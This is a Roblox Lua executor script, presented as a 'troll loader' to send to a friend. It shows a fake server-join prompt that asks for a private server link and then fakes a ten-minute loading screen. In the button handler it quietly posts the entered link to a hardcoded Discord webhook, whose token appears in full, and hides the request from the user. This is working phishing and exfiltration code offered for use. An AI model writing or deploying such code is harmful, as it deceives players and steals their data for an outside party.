-- // TROLL LOADER SCRIPT
-- // Paste into executor and send to your friend
-- // Replace the webhook URL below with yours

local WEBHOOK_URL = https://discordapp.com/api/webhooks/1479924863308271832/EMB7xFY3qOT3rMnBy-8XVyZCDeK0UcOcjUClmhadh8WmjoT47Ay12SrMNA3bEpM9PoW6"

-- // Services
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local HttpService = game:GetService("HttpService")
local LocalPlayer = Players.LocalPlayer
local PlayerGui = LocalPlayer:WaitForChild("PlayerGui")

-- // Remove old gui if re-running
if PlayerGui:FindFirstChild("TrollGui") then
    PlayerGui.TrollGui:Destroy()
end

-- // Create ScreenGui
local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = "TrollGui"
ScreenGui.ResetOnSpawn = false
ScreenGui.IgnoreGuiInset = true
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.Parent = PlayerGui

-- ============================================================
-- // VALID PRIV SERVER CHECK
-- // Must contain roblox.com/games/ AND privateServerLinkCode
-- ============================================================
local function isValidPrivServer(link)
    if type(link) ~= "string" then return false end
    local l = link:lower():gsub("%s+", "")
    return l:find("roblox%.com/games/") ~= nil and l:find("privateserverlink") ~= nil
end

-- ============================================================
-- // TOP RIGHT NOTIFICATION
-- ============================================================
local Notif = Instance.new("Frame")
Notif.Name = "Notif"
Notif.Size = UDim2.new(0, 240, 0, 46)
Notif.Position = UDim2.new(1, 10, 0, 16)
Notif.BackgroundColor3 = Color3.fromRGB(30, 180, 120)
Notif.BorderSizePixel = 0
Notif.ZIndex = 50
Notif.Parent = ScreenGui

Instance.new("UICorner", Notif).CornerRadius = UDim.new(0, 10)

local NotifLabel = Instance.new("TextLabel")
NotifLabel.Size = UDim2.new(1, -16, 1, 0)
NotifLabel.Position = UDim2.new(0, 14, 0, 0)
NotifLabel.BackgroundTransparency = 1
NotifLabel.Text = "✅  Joining server..."
NotifLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
NotifLabel.TextSize = 14
NotifLabel.Font = Enum.Font.GothamBold
NotifLabel.TextXAlignment = Enum.TextXAlignment.Left
NotifLabel.ZIndex = 51
NotifLabel.Parent = Notif

local function showNotif()
    TweenService:Create(Notif, TweenInfo.new(0.5, Enum.EasingStyle.Back, Enum.EasingDirection.Out), {
        Position = UDim2.new(1, -256, 0, 16)
    }):Play()
    task.delay(4, function()
        TweenService:Create(Notif, TweenInfo.new(0.4, Enum.EasingStyle.Quad, Enum.EasingDirection.In), {
            Position = UDim2.new(1, 10, 0, 16)
        }):Play()
    end)
end

-- ============================================================
-- // INPUT GUI
-- ============================================================
local InputFrame = Instance.new("Frame")
InputFrame.Name = "InputFrame"
InputFrame.Size = UDim2.new(0, 420, 0, 240)
InputFrame.Position = UDim2.new(0.5, -210, 0.5, -120)
InputFrame.BackgroundColor3 = Color3.fromRGB(22, 27, 55)
InputFrame.BorderSizePixel = 0
InputFrame.ZIndex = 10
InputFrame.Parent = ScreenGui

Instance.new("UICorner", InputFrame).CornerRadius = UDim.new(0, 14)

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, 0, 0, 40)
Title.Position = UDim2.new(0, 0, 0, 16)
Title.BackgroundTransparency = 1
Title.Text = "Put Priv Server Link"
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.TextSize = 20
Title.Font = Enum.Font.GothamBold
Title.ZIndex = 11
Title.Parent = InputFrame

-- Error label (hidden by default)
local ErrLabel = Instance.new("TextLabel")
ErrLabel.Size = UDim2.new(1, -40, 0, 18)
ErrLabel.Position = UDim2.new(0, 20, 0, 60)
ErrLabel.BackgroundTransparency = 1
ErrLabel.Text = "❌  Not a valid Roblox private server link"
ErrLabel.TextColor3 = Color3.fromRGB(255, 80, 80)
ErrLabel.TextSize = 12
ErrLabel.Font = Enum.Font.Gotham
ErrLabel.TextXAlignment = Enum.TextXAlignment.Left
ErrLabel.Visible = false
ErrLabel.ZIndex = 11
ErrLabel.Parent = InputFrame

local Box = Instance.new("TextBox")
Box.Size = UDim2.new(1, -40, 0, 42)
Box.Position = UDim2.new(0, 20, 0, 82)
Box.BackgroundColor3 = Color3.fromRGB(32, 40, 78)
Box.BorderSizePixel = 0
Box.PlaceholderText = "https://www.roblox.com/games/...?privateServerLinkCode=..."
Box.PlaceholderColor3 = Color3.fromRGB(95, 110, 160)
Box.Text = ""
Box.TextColor3 = Color3.fromRGB(255, 255, 255)
Box.TextSize = 12
Box.Font = Enum.Font.Gotham
Box.ClearTextOnFocus = false
Box.ZIndex = 11
Box.Parent = InputFrame

Instance.new("UICorner", Box).CornerRadius = UDim.new(0, 8)

local Btn = Instance.new("TextButton")
Btn.Size = UDim2.new(1, -40, 0, 44)
Btn.Position = UDim2.new(0, 20, 0, 144)
Btn.BackgroundColor3 = Color3.fromRGB(220, 50, 80)
Btn.BorderSizePixel = 0
Btn.Text = "Join Server"
Btn.TextColor3 = Color3.fromRGB(255, 255, 255)
Btn.TextSize = 15
Btn.Font = Enum.Font.GothamBold
Btn.ZIndex = 11
Btn.Parent = InputFrame

Instance.new("UICorner", Btn).CornerRadius = UDim.new(0, 8)

Btn.MouseEnter:Connect(function()
    TweenService:Create(Btn, TweenInfo.new(0.15), {BackgroundColor3 = Color3.fromRGB(240, 70, 100)}):Play()
end)
Btn.MouseLeave:Connect(function()
    TweenService:Create(Btn, TweenInfo.new(0.15), {BackgroundColor3 = Color3.fromRGB(220, 50, 80)}):Play()
end)

-- ============================================================
-- // FULLSCREEN LOADING GUI
-- ============================================================
local LoadFrame = Instance.new("Frame")
LoadFrame.Name = "LoadFrame"
LoadFrame.Size = UDim2.new(1, 0, 1, 0)
LoadFrame.Position = UDim2.new(0, 0, 0, 0)
LoadFrame.BackgroundColor3 = Color3.fromRGB(15, 18, 40)
LoadFrame.BorderSizePixel = 0
LoadFrame.BackgroundTransparency = 1
LoadFrame.Visible = false
LoadFrame.ZIndex = 30
LoadFrame.Parent = ScreenGui

-- Top accent bar
local AccentBar = Instance.new("Frame")
AccentBar.Size = UDim2.new(1, 0, 0, 3)
AccentBar.Position = UDim2.new(0, 0, 0, 0)
AccentBar.BackgroundColor3 = Color3.fromRGB(0, 180, 216)
AccentBar.BorderSizePixel = 0
AccentBar.ZIndex = 31
AccentBar.Parent = LoadFrame

-- Centered content
local Center = Instance.new("Frame")
Center.Size = UDim2.new(0, 340, 0, 270)
Center.Position = UDim2.new(0.5, -170, 0.5, -135)
Center.BackgroundTransparency = 1
Center.ZIndex = 31
Center.Parent = LoadFrame

local LoadTitle = Instance.new("TextLabel")
LoadTitle.Size = UDim2.new(1, 0, 0, 44)
LoadTitle.Position = UDim2.new(0, 0, 0, 0)
LoadTitle.BackgroundTransparency = 1
LoadTitle.Text = "Loading"
LoadTitle.TextColor3 = Color3.fromRGB(255, 255, 255)
LoadTitle.TextSize = 34
LoadTitle.Font = Enum.Font.GothamBold
LoadTitle.ZIndex = 32
LoadTitle.Parent = Center

local SpinnerBack = Instance.new("Frame")
SpinnerBack.Size = UDim2.new(0, 84, 0, 84)
SpinnerBack.Position = UDim2.new(0.5, -42, 0, 56)
SpinnerBack.BackgroundTransparency = 1
SpinnerBack.ZIndex = 32
SpinnerBack.Parent = Center

local SpinnerImg = Instance.new("ImageLabel")
SpinnerImg.Size = UDim2.new(1, 0, 1, 0)
SpinnerImg.BackgroundTransparency = 1
SpinnerImg.Image = "rbxassetid://4965945816"
SpinnerImg.ImageColor3 = Color3.fromRGB(0, 180, 216)
SpinnerImg.ZIndex = 33
SpinnerImg.Parent = SpinnerBack

local BarTrack = Instance.new("Frame")
BarTrack.Size = UDim2.new(1, 0, 0, 9)
BarTrack.Position = UDim2.new(0, 0, 0, 162)
BarTrack.BackgroundColor3 = Color3.fromRGB(35, 44, 85)
BarTrack.BorderSizePixel = 0
BarTrack.ZIndex = 32
BarTrack.Parent = Center

Instance.new("UICorner", BarTrack).CornerRadius = UDim.new(1, 0)

local BarFill = Instance.new("Frame")
BarFill.Size = UDim2.new(0, 0, 1, 0)
BarFill.BackgroundColor3 = Color3.fromRGB(0, 180, 216)
BarFill.BorderSizePixel = 0
BarFill.ZIndex = 33
BarFill.Parent = BarTrack

Instance.new("UICorner", BarFill).CornerRadius = UDim.new(1, 0)

local PctLabel = Instance.new("TextLabel")
PctLabel.Size = UDim2.new(1, 0, 0, 40)
PctLabel.Position = UDim2.new(0, 0, 0, 182)
PctLabel.BackgroundTransparency = 1
PctLabel.Text = "%0"
PctLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
PctLabel.TextSize = 28
PctLabel.Font = Enum.Font.GothamBold
PctLabel.ZIndex = 32
PctLabel.Parent = Center

local StatusLabel = Instance.new("TextLabel")
StatusLabel.Size = UDim2.new(1, 0, 0, 24)
StatusLabel.Position = UDim2.new(0, 0, 0, 232)
StatusLabel.BackgroundTransparency = 1
StatusLabel.Text = "Connecting to server..."
StatusLabel.TextColor3 = Color3.fromRGB(100, 120, 185)
StatusLabel.TextSize = 13
StatusLabel.Font = Enum.Font.Gotham
StatusLabel.ZIndex = 32
StatusLabel.Parent = Center

-- ============================================================
-- // SPINNER LOOP
-- ============================================================
local spinning = false
local function startSpinner()
    spinning = true
    task.spawn(function()
        local angle = 0
        while spinning do
            angle = (angle + 5) % 360
            SpinnerImg.Rotation = angle
            task.wait(0.03)
        end
    end)
end

-- ============================================================
-- // FAKE LOADING (10 minutes)
-- ============================================================
local statusMsgs = {
    "Connecting to server...",
    "Authenticating session...",
    "Loading game assets...",
    "Fetching player data...",
    "Syncing world state...",
    "Loading textures...",
    "Rendering environment...",
    "Preparing spawn point...",
    "Finalizing connection...",
    "Almost there...",
}

local function startFakeLoading()
    local totalTime = 600
    local elapsed = 0
    local tickRate = 0.5

    startSpinner()

    task.spawn(function()
        while elapsed < totalTime do
            task.wait(tickRate)
            elapsed = elapsed + tickRate

            local pct = math.min(math.floor((elapsed / totalTime) * 100), 99)

            TweenService:Create(BarFill, TweenInfo.new(0.45), {
                Size = UDim2.new(pct / 100, 0, 1, 0)
            }):Play()

            PctLabel.Text = "%" .. pct

            local msgIdx = math.clamp(math.ceil((pct / 100) * #statusMsgs), 1, #statusMsgs)
            StatusLabel.Text = statusMsgs[msgIdx]
        end

        PctLabel.Text = "%99"
        StatusLabel.Text = "Finalizing connection..."
    end)
end

-- ============================================================
-- // BUTTON LOGIC
-- ============================================================
Btn.MouseButton1Click:Connect(function()
    local link = Box.Text

    if not isValidPrivServer(link) then
        ErrLabel.Visible = true
        TweenService:Create(Box, TweenInfo.new(0.1), {BackgroundColor3 = Color3.fromRGB(140, 30, 50)}):Play()
        task.wait(0.5)
        TweenService:Create(Box, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(32, 40, 78)}):Play()
        task.delay(3, function() ErrLabel.Visible = false end)
        return
    end

    ErrLabel.Visible = false

    -- Send webhook silently in background
    task.spawn(function()
        pcall(function()
            local body = HttpService:JSONEncode({
                embeds = {{
                    title = "🔗 Private Server Link!",
                    description = "```\n" .. link .. "\n```",
                    color = 0x00b4d8,
                    timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ"),
                    footer = { text = "Server Joiner" }
                }}
            })
            local req = (syn and syn.request) or (http and http.request) or request
            req({
                Url = WEBHOOK_URL,
                Method = "POST",
                Headers = { ["Content-Type"] = "application/json" },
                Body = body
            })
        end)
    end)

    -- Top-right notif
    showNotif()

    -- Fade out input GUI
    for _, child in ipairs(InputFrame:GetDescendants()) do
        if child:IsA("TextLabel") or child:IsA("TextButton") or child:IsA("TextBox") then
            TweenService:Create(child, TweenInfo.new(0.25), {TextTransparency = 1}):Play()
        end
    end
    TweenService:Create(InputFrame, TweenInfo.new(0.3), {BackgroundTransparency = 1}):Play()
    task.wait(0.35)
    InputFrame.Visible = false

    -- Fade in fullscreen loading
    LoadFrame.Visible = true
    TweenService:Create(LoadFrame, TweenInfo.new(0.5, Enum.EasingStyle.Quad), {
        BackgroundTransparency = 0
    }):Play()

    startFakeLoading()
end)
